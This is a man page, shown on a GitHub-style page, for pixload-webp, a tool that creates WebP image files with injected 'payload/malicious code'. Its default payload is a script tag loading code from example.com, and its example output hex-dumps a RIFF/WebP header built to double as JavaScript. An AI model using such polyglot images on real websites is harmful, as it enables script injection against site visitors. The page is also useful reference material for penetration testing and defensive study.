Skip to content

Latest commit

 

History

History
77 lines (49 loc) · 2.08 KB

pixload-webp.1.pod

File metadata and controls

77 lines (49 loc) · 2.08 KB

NAME

pixload-webp - hide payload/malicious code in WebP images

SYNOPSIS

pixload-webp [OPTION]... FILE

DESCRIPTION

pixload-webp creates a WebP Image with payload, or injects payload into existing image.

Currently, there is no possibility to inject the payload into an existing WebP image. Only the new (minimal) WebP image will be created and your payload will be injected into.

OPTIONS

Mandatory arguments to long options are mandatory for short options too.

-P, --payload STRING

Set payload for injection. Default is <script src=//example.com></script>.

-v, --version

Print version and exit.

-h, --help

Print help and exit.

If the output FILE already exists, the payload will be injected into existing image, but this image will be corrupted. Otherwise, the new one will be created.

EXAMPLE

$ pixload-webp payload.webp
..... WebP Payload Creator/Injector ......
..........................................
... https://github.com/sighook/pixload ...
..........................................

[>] Generating output file
[✔] File saved to: payload.webp

[>] Injecting payload into payload.webp
[✔] Payload was injected successfully

payload.webp: RIFF (little-endian) data, Web/P image

00000000  52 49 46 46 2f 2a 00 00  57 45 42 50 56 50 38 4c  |RIFF/*..WEBPVP8L|
00000010  ff ff ff 00 2f 00 00 00  10 07 10 11 11 88 88 fe  |..../...........|
00000020  07 00 2a 2f 3d 31 3b 3c  73 63 72 69 70 74 20 73  |..*/=1;<script s|
00000030  72 63 3d 2f 2f 65 78 61  6d 70 6c 65 2e 63 6f 6d  |rc=//example.com|
00000040  3e 3c 2f 73 63 72 69 70  74 3e 3b                 |></script>;|
0000004b

SEE ALSO

pixload-bmp(1), pixload-gif(1), pixload-jpg(1), pixload-png(1)